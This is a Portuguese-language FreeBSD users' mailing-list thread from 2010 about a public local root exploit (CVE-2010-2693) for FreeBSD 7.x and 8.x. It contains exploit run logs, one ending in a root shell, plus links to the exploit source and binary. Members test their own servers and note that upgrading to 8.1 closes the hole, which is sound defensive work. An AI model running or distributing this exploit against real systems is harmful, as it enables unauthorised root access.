Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
o bom é que ao menos o exploit é local.. quem vende acesso shell vai ter um trabalhinho! hehee Em 22/08/10 22:28, Leandro Keffer escreveu: Pelo visto teremos muito trabalho nessa segunda :D - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Testado em um 8.0 branch 3 e funcionando : ( FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue May 25 20:54:11 UTC 2010 r...@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64 [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.7 [+] found getuid function at 0x00056990 [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... fbsd80# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) Em 21 de agosto de 2010 11:44, Anderson Eduardo lis...@secover.com.brescreveu: Em 21/8/2010 11:42, Nilson escreveu: Em 21 de agosto de 2010 11:17, Leandro Kefferkeffer...@gmail.com escreveu: Será que ataca 8.0 com ultimo branch tambem ?? Alguem disposto a testar ?? estou sem acesso a servidores free nesse momento T+ pessoal Acabei de testar num 8.0-RELEASE-p2 e funcionou, no 8.1-STABLE (cvsupado semana passada) não funcionou. - Nilson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd Outro PoC - http://jon.oberheide.org/files/cve-2010-2693.c Esse é melhor. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
2010/8/22 Leandro Keffer keffer...@gmail.com Testado em um 8.0 branch 3 e funcionando : ( FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue May 25 20:54:11 UTC 2010 r...@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64 [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.7 [+] found getuid function at 0x00056990 [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... fbsd80# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) Sabe se rola no 8.1-RELEASE? -- Renato Botelho - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
funciona no 8.1 nao garga: FreeBSD koopa.frederick.eti.br 8.1-STABLE FreeBSD 8.1-STABLE #0: Thu Aug 19 19:53:16 BRT 2010 r...@koopa.frederick.eti.br:/usr/src/sys/i386/compile/KOOPA i386 $ whoami frederick $ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.7 [+] found getuid function at 0x00049b08 [+] target: 0x00049b08, adjusted: 0x00049308, writes: 1171 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... Password: Em 22/08/10 19:18, Renato Botelho escreveu: 2010/8/22 Leandro Kefferkeffer...@gmail.com Testado em um 8.0 branch 3 e funcionando : ( FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue May 25 20:54:11 UTC 2010 r...@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64 [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.7 [+] found getuid function at 0x00056990 [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... fbsd80# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) Sabe se rola no 8.1-RELEASE? - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Em 22/8/2010 19:18, Renato Botelho escreveu: 2010/8/22 Leandro Kefferkeffer...@gmail.com Testado em um 8.0 branch 3 e funcionando : ( FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue May 25 20:54:11 UTC 2010 r...@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64 [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.7 [+] found getuid function at 0x00056990 [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... fbsd80# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) Sabe se rola no 8.1-RELEASE? Frederick, Acredito que seu sistema deve ta patcheado quanto a essa falha. No advisory fala que todos a partir do 7.X. -- Anderson Eduardo Diretor Geral Tel.: +55 (71) 3641-6450 Secover - Serviços em TI e Segurança da Informação http://www.secover.com.br - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Em 22/8/2010 19:25, Renato Frederick escreveu: funciona no 8.1 nao garga: FreeBSD koopa.frederick.eti.br 8.1-STABLE FreeBSD 8.1-STABLE #0: Thu Aug 19 19:53:16 BRT 2010 r...@koopa.frederick.eti.br:/usr/src/sys/i386/compile/KOOPA i386 $ whoami frederick $ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.7 [+] found getuid function at 0x00049b08 [+] target: 0x00049b08, adjusted: 0x00049308, writes: 1171 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... Password: Em 22/08/10 19:18, Renato Botelho escreveu: 2010/8/22 Leandro Kefferkeffer...@gmail.com Testado em um 8.0 branch 3 e funcionando : ( FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue May 25 20:54:11 UTC 2010 r...@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64 [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.7 [+] found getuid function at 0x00056990 [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... fbsd80# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) Sabe se rola no 8.1-RELEASE? - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd Frederick, Acredito que seu sistema esteja patcheado quanto a essa falha. No advisory diz que todos a partir do 7.X. -- Anderson Eduardo Diretor Geral Tel.: +55 (71) 3641-6450 Secover - Serviços em TI e Segurança da Informação http://www.secover.com.br - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
On Sun, August 22, 2010 11:46, Leandro Keffer wrote: Testado em um 8.0 branch 3 e funcionando : ( FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue May 25 20:54:11 UTC 2010 r...@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64 [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.7 [+] found getuid function at 0x00056990 [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... fbsd80# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) aqui parece num funcionar, e ainda pede senha no final ... (do su) [math...@lamneth /usr/home/matheus/temp/exploits]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.6 [+] found getuid function at 0x0005a168 [+] target: 0x0005a168, adjusted: 0x00059968, writes: 1433 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... Password: su: Sorry [math...@lamneth /usr/home/matheus/temp/exploits]$ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.6 [+] found getuid function at 0x0005a168 [+] target: 0x0005a168, adjusted: 0x00059968, writes: 1433 [+] spawning listener thread... [-] couldn't bind to listener socket FreeBSD lamneth 8.0-BETA3 FreeBSD 8.0-BETA3 #0: Thu Aug 27 01:06:32 BRT 2009 r...@lamneth:/usr/obj/usr/home/matheus/public_html/FreeBSD/csup/CURRENT/src/sys/Lamneth8 i386 curioso :) matheus Em 21 de agosto de 2010 11:44, Anderson Eduardo lis...@secover.com.brescreveu: Em 21/8/2010 11:42, Nilson escreveu: Em 21 de agosto de 2010 11:17, Leandro Kefferkeffer...@gmail.com escreveu: Será que ataca 8.0 com ultimo branch tambem ?? Alguem disposto a testar ?? estou sem acesso a servidores free nesse momento T+ pessoal Acabei de testar num 8.0-RELEASE-p2 e funcionou, no 8.1-STABLE (cvsupado semana passada) não funcionou. - Nilson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd Outro PoC - http://jon.oberheide.org/files/cve-2010-2693.c Esse é melhor. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- We will call you cygnus, The God of balance you shall be A: Because it messes up the order in which people normally read text. Q: Why is top-posting such a bad thing? http://en.wikipedia.org/wiki/Posting_style - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Anderson, Eu não apliquei patch, apenas fiz upgrade pro 8.1, este servidor estava com o 8.0. Acredito que fazendo upgrade pro 8.1 usando o método padrão(csup, make buildworld, balbalblabla) resolve sem maiores stress(além de ter que dar um boot, é claro). []s Em 22/08/10 19:35, Anderson Eduardo escreveu: Frederick, Acredito que seu sistema esteja patcheado quanto a essa falha. No advisory diz que todos a partir do 7.X. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Pelo visto teremos muito trabalho nessa segunda :D Em 22 de agosto de 2010 20:13, Renato Frederick ren...@frederick.eti.brescreveu: Anderson, Eu não apliquei patch, apenas fiz upgrade pro 8.1, este servidor estava com o 8.0. Acredito que fazendo upgrade pro 8.1 usando o método padrão(csup, make buildworld, balbalblabla) resolve sem maiores stress(além de ter que dar um boot, é claro). []s Em 22/08/10 19:35, Anderson Eduardo escreveu: Frederick, Acredito que seu sistema esteja patcheado quanto a essa falha. No advisory diz que todos a partir do 7.X. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Será que ataca 8.0 com ultimo branch tambem ?? Alguem disposto a testar ?? estou sem acesso a servidores free nesse momento T+ pessoal Em 20 de agosto de 2010 21:46, Antônio Pessoa antoniopes...@bsd.com.brescreveu: Transcrevo a notícia abaixo: Foi disponibilizado ontem (19/08) na lista Full Disclosure um exploit no FreeBSD 7.x e 8.x que dá acesso de root no shell. O exploit chamado de “mbufs() cache poisoning local priv escalation” está público e seu código pode ser visto no Pastebin; um vídeo de seu funcionamento pode ser visto no YouTube. Fonte: http://www.seginfo.com.br/exploit-no-freebsd-7-x-e-8-x/ Código: http://ownage.pastebin.com/dyKLRr0v Binário: http://seclists.org/fulldisclosure/2010/Aug/att-219/freebsd-cache_c.bin Lista onde foi divulgado: http://seclists.org/fulldisclosure/2010/Aug/219 -- Antônio Rogério Lins de A. Pessoa Técnico em Tecnologia da Informação - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Em 21 de agosto de 2010 11:17, Leandro Keffer keffer...@gmail.com escreveu: Será que ataca 8.0 com ultimo branch tambem ?? Alguem disposto a testar ?? estou sem acesso a servidores free nesse momento T+ pessoal Acabei de testar num 8.0-RELEASE-p2 e funcionou, no 8.1-STABLE (cvsupado semana passada) não funcionou. - Nilson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Em 21/8/2010 11:42, Nilson escreveu: Em 21 de agosto de 2010 11:17, Leandro Kefferkeffer...@gmail.com escreveu: Será que ataca 8.0 com ultimo branch tambem ?? Alguem disposto a testar ?? estou sem acesso a servidores free nesse momento T+ pessoal Acabei de testar num 8.0-RELEASE-p2 e funcionou, no 8.1-STABLE (cvsupado semana passada) não funcionou. - Nilson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd Outro PoC - http://jon.oberheide.org/files/cve-2010-2693.c Esse é melhor. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Transcrevo a notícia abaixo: Foi disponibilizado ontem (19/08) na lista Full Disclosure um exploit no FreeBSD 7.x e 8.x que dá acesso de root no shell. O exploit chamado de “mbufs() cache poisoning local priv escalation” está público e seu código pode ser visto no Pastebin; um vídeo de seu funcionamento pode ser visto no YouTube. Fonte: http://www.seginfo.com.br/exploit-no-freebsd-7-x-e-8-x/ Código: http://ownage.pastebin.com/dyKLRr0v Binário: http://seclists.org/fulldisclosure/2010/Aug/att-219/freebsd-cache_c.bin Lista onde foi divulgado: http://seclists.org/fulldisclosure/2010/Aug/219 -- Antônio Rogério Lins de A. Pessoa Técnico em Tecnologia da Informação - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd